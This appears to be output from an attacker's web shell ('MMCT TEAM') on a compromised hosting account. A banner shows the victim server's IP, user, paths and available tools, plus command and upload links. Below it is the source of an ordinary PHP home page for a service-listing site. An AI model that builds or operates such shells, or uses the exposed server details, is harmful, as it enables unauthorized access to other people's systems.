MMCT TEAM
Server IP : 162.214.80.37  /  Your IP : 216.73.216.83
Web Server : Apache
System : Linux sh013.webhostingservices.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : imyrqtmy ( 2189)
PHP Version : 8.2.18
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home2/imyrqtmy/public_html/clickonn/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/imyrqtmy/public_html/clickonn/home.php
<!DOCTYPE html>

<html lang="en">



<?php include 'include/head.php'; ?>

<style>
    .select2-selection{
            border: none !important;
    }
</style>


<body >



	

	<div class="main-wrapper">

	<!--<h1>Get Current Location</h1>-->
 <!--   <button onclick="getLocation()">Get Location</button>-->
    <p id="demo" style="display:none;"></p>

		<!-- Header -->

		<?php include 'include/header.php'; ?>

		<!-- /Header -->

		

		<!-- Hero Section -->

		

		<?php include 'include/slider1.php'; ?>



		<section class="service-nine-section">
			<div class="container">
				<div class="row">
					<div class="col-md-12 text-center">
						<div class="section-heading section-heading-nine aos" data-aos="fade-up">
							<p>TRUSTED & QUALITY</p>
							<h2>Popular Categories</h2>
						</div>
					</div>
				</div>
				<div class="row">
					<div class="col-md-12">
						<div class="owl-carousel service-nine-slider">
						<!-- ORDER BY id ASC LIMIT 12 OFFSET 0 -->
										<?php
											$count = 1;
                                                $sc = "SELECT * FROM `tbl_categories`";
                                                $scs = mysqli_query($con, $sc) or die(mysqli_error($con));
                                                while ($scs_c = mysqli_fetch_assoc($scs)){ 
                                                   
                                                   $cid = $scs_c['id'];
                                                   
                                                $s1 = "SELECT count(*) as total1 FROM `tbl_sub_category` where catid='$cid'";
                                                $ss1 = mysqli_query($con, $s1) or die(mysqli_error($con));
                                                $sss1 = mysqli_fetch_assoc($ss1);

                                                    ?>
							<div class="service-widget service-widget-nine aos" data-aos="fade-up">
								<div class="service-img">
									<a href="search.php?id=<?php echo $scs_c['id']; ?>">
										<img class="img-fluid serv-img" alt="Service Image"
											src="Admin/categories/<?php echo $scs_c['img']; ?>">
									</a>
								</div>
								<div class="service-content service-feature-nine">
									<div class="shop-content-logo">
										<img src="assets/img/icons/car-service-icon-1.svg" alt="">
									</div>
									<span><?php echo $sss1['total1']; ?> Services</span>
									<p><?php echo $scs_c['name']; ?> </p>
								</div>
							</div>

							<?php } ?>
						</div>
					</div>
				</div>
				
			</div>
		</section>




<section class="features-four-section">
		<div class="container">
			<div class="section-heading section-heading-four">
				<div class="row align-items-center">
					<div class="col-md-6 aos" data-aos="fade-up">
						<h2>Featured Categories</h2>
						<!-- <p>Mauris ut cursus nunc. Morbi eleifend, ligula at consectetur vehicula</p> -->
					</div>
				
				</div>
			</div>
			<div class="row">
				<div class="col-md-12"> 
					<div class="owl-carousel features-four-slider common-four-slider">


					<!-- ORDER BY id ASC LIMIT 12 OFFSET 24 -->
					<?php
                                                $count = 1;
                                                $sc3 = "SELECT * FROM `tbl_categories`";
                                                $scs3 = mysqli_query($con, $sc3) or die(mysqli_error($con));
                                                while ($scs_c3 = mysqli_fetch_assoc($scs3)){ 
                                                    
                                                     $cid2 = $scs_c3['id'];
                                                   
                                                   $s3 = "SELECT count(*) as total3 FROM `tbl_sub_category` where catid='$cid2'";
                                                $ss3 = mysqli_query($con, $s3) or die(mysqli_error($con));
                                                $sss3 = mysqli_fetch_assoc($ss3);
                                                   
                                                   
                                                    
                                                    ?>
						<div class="service-widget service-two aos" data-aos="fade-up">
							<div class="service-img service-four-img">
								<a href="search.php?id=<?php echo $scs_c3['id']; ?>">
									<img class="img-fluid serv-img" alt="Service Image"
										src="Admin/categories/<?php echo $scs_c3['img']; ?>">
								</a>
								
							</div>
							<div class="service-content service-four-content">
								<h3 class="title">
									<a href="search.php?id=<?php echo $scs_c3['id']; ?>"><?php echo $scs_c3['name']; ?></a>
								</h3>
								<p class="service-cater-bottom"><?php echo $sss3['total3']; ?> Service</p>
								
							</div>
						</div>

						<?php } ?>




					
					</div>
				</div>
			</div>
		</div>
	</section>



<section class="additional-service-section">
			<div class="container">
				<div class="row">
					<div class="col-md-12 text-center">
						<div class="section-heading section-heading-nine aos" data-aos="fade-up">
							<p>TRUSTED & QUALITY </p>
							<h2>Additional Categories</h2>
						</div>
					</div>
				</div>
				<div class="row">
					<div class="col-md-12">
						<div class="owl-carousel service-nine-slider">

						<!-- ORDER BY id ASC LIMIT 12 OFFSET 36 -->

											<?php
                                                $count = 1;
                                                $sc4 = "SELECT * FROM `tbl_categories`";
                                                $scs4 = mysqli_query($con, $sc4) or die(mysqli_error($con));
                                                while ($scs_c4 = mysqli_fetch_assoc($scs4)){
                                                    
                                                     $cid3 = $scs_c4['id'];
                                                   
                                                   $s4 = "SELECT count(*) as total4 FROM `tbl_sub_category` where catid='$cid3'";
                                                $ss4 = mysqli_query($con, $s4) or die(mysqli_error($con));
                                                $sss4 = mysqli_fetch_assoc($ss4);
                                                   
                                                   
                                                    
                                                    ?>
							<div class="service-widget service-widget-nine service-widget-nine-two aos"
								data-aos="fade-up">
								<div class="service-img">
									<a href="search.php?id=<?php echo $scs_c4['id']; ?>">
										<img class="img-fluid serv-img" alt="Service Image"
											src="Admin/categories/<?php echo $scs_c4['img']; ?>">
									</a>
									<!-- <div class="item-info items-nine items-nine-two">
										<img src="assets/img/profiles/avatar-05.jpg" alt="">
									</div> -->
								</div>
								<div class="service-content service-feature-nine">
									<span><?php echo $sss4['total4']; ?>  Services</span>
									<p><?php echo $scs_c4['name']; ?></p>
								</div>
							</div>

							<?php  } ?>


						
						</div>
					</div>
				</div>
			
			</div>
		</section>





		

		

		<!-- Client Section -->

		<section class="client-section-two">			

			<div class="container">

				<div class="row">

					<div class="col-md-12 text-center">

						<div class="section-heading sec-header aos" data-aos="fade-up">

							<h2>Testimonials</h2>

							<!--<p>Lorem ipsum dolor sit amet, consectetur elit</p>-->

						</div>

					</div>

				</div>

				<div class="row">

					<div class="col-md-12">

						<div class="owl-carousel client-slider">

								

							<div class="client-box aos" data-aos="fade-up">

								<div class="client-content">

									<div class="rating">

										<i class="fas fa-star filled"></i>

										<i class="fas fa-star filled"></i>

										<i class="fas fa-star filled"></i>

										<i class="fas fa-star filled"></i>

										<i class="fas fa-star filled"></i>

									</div>

									<h6>“Services is Good”</h6>

                                    <p>
                                        All service providers here are KYC approved.  Click Onn is a lead providing platform where customers get complete information of service providers on their profile page.  And introduces a service provider to only one customer.
                                    </p>
								</div>

								<div class="client-img">

									

									<div class="client-name">

										<h5> Seema Dudeja </h5>

										<h6>Founder & CEO Zenith House Keeping Services</h6>

									</div>

								</div>

							</div>

							<div class="client-box aos" data-aos="fade-up">

								<div class="client-content">

									<div class="rating">

										<i class="fas fa-star filled"></i>

										<i class="fas fa-star filled"></i>

										<i class="fas fa-star filled"></i>

										<i class="fas fa-star filled"></i>

										<i class="fas fa-star filled"></i>

									</div>

									<h6>“Best Platform ”</h6>

                                    <p>
                                        Finding a home service or professional service provider made it easy.  Because this is a platform where you can find all the service providers in your area.
                                    </p>
								</div>

								<div class="client-img">

								
									<div class="client-name">

										<h5> V.K.singh </h5>

										<h6>Founder- global interior</h6>

									</div>

								</div>

							</div>

							
							

						</div>

					</div>

				</div>

			</div>

		</section>

	

		<!-- Footer -->

	<?php include 'include/footer.php'; ?>

		<!-- /Footer -->

		

		<!-- Cursor -->

		<div class="mouse-cursor cursor-outer"></div>

		<div class="mouse-cursor cursor-inner"></div>

		<!-- /Cursor -->	

		

		<!-- Delete Account -->

		<div class="modal fade custom-modal" id="del-account">

			<div class="modal-dialog modal-dialog-centered">

				<div class="modal-content">

					<div class="modal-header border-bottom-0 justify-content-between">

						<h5 class="modal-title">Delete Account</h5>

						<button type="button" class="close-btn" data-bs-dismiss="modal" aria-label="Close"><i class="feather-x"></i></button>

					</div>

					<div class="modal-body pt-0">

						<div class="write-review">

							<form action="https://html.truelysell.com/template3/login.html">

								<p>Are you sureyou want to delete This Account? To delete your account, Type your password.</p>

								<div class="form-group">

									<label class="col-form-label">Password</label>

									<div class="pass-group">

										<input type="password" class="form-control pass-input" placeholder="*************">

										<span class="toggle-password feather-eye"></span>

									</div>

								</div>

								<div class="modal-submit text-end">

									<a href="#" class="btn btn-secondary me-2" data-bs-dismiss="modal">Cancel</a>

									<button type="submit" class="btn btn-danger">Delete Account</button>

								</div>

							</form>

						</div>

					</div>

				</div>

			</div>

		</div>

		<!-- /Delete Account -->

		

	</div>

	

	

	<!-- scrollToTop start -->

	<div class="progress-wrap active-progress">

		<svg class="progress-circle svg-content" width="100%" height="100%" viewBox="-1 -1 102 102">

		<path d="M50,1 a49,49 0 0,1 0,98 a49,49 0 0,1 0,-98" style="transition: stroke-dashoffset 10ms linear 0s; stroke-dasharray: 307.919px, 307.919px; stroke-dashoffset: 228.265px;"></path>

		</svg>

	</div>

	<!-- scrollToTop end -->

	

	<!-- jQuery -->

	<script data-cfasync="false" src="../cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="assets/js/jquery-3.6.1.min.js"></script>



	<!-- Bootstrap Core JS -->

	<script src="assets/js/bootstrap.bundle.min.js"></script>



	<!-- Fearther JS -->

	<script src="assets/js/feather.min.js"></script>

		

	<!-- Owl Carousel JS -->

	<script src="assets/js/owl.carousel.min.js"></script>



	<!-- select JS -->

	<script src="assets/plugins/select2/js/select2.min.js"></script>

	

	<!-- Aos -->

	<script src="assets/plugins/aos/aos.js"></script>

		

	<!-- Slick JS -->

	<script src="assets/js/slick.js"></script>

	

	<!-- Top JS -->

	<script src="assets/js/backToTop.js"></script>



	<!-- Custom JS -->

	<script src="assets/js/script.js"></script>

	

	<script src="assets/plugins/theia-sticky-sidebar/ResizeSensor.js"></script>

	<script src="assets/plugins/theia-sticky-sidebar/theia-sticky-sidebar.js"></script>

	 <script src="https://cdnjs.cloudflare.com/ajax/libs/select2/4.0.6-rc.0/js/select2.min.js"></script>


    
    <script type="text/javascript">
        
        $(document).ready(function() {
            $('.fav_clr').select2({
        // placeholder: 'colors',
        // width: '100%',
            // border: '1px solid #e4e5e7',
    });
        });

        $('.fav_clr').on("select2:select", function (e) { 
         var data = e.params.data.text;
         if(data=='all'){
            $(".fav_clr > option").prop("selected","selected");
            $(".fav_clr").trigger("change");
        }
    });


</script>

 <script type="text/javascript">
        
        $(document).ready(function() {
            $('.fav_clrs').select2({
        // placeholder: 'colors',
        // width: '100%',
            // border: '1px solid #e4e5e7',
    });
        });

        $('.fav_clrs').on("select2:select", function (e) { 
         var data = e.params.data.text;
         if(data=='all'){
            $(".fav_clrs > option").prop("selected","selected");
            $(".fav_clrs").trigger("change");
        }
    });


</script>

       
  
    	<!-- <script src="assets/js/location.js"></script> -->
</body>

</html>

MMCT - 2023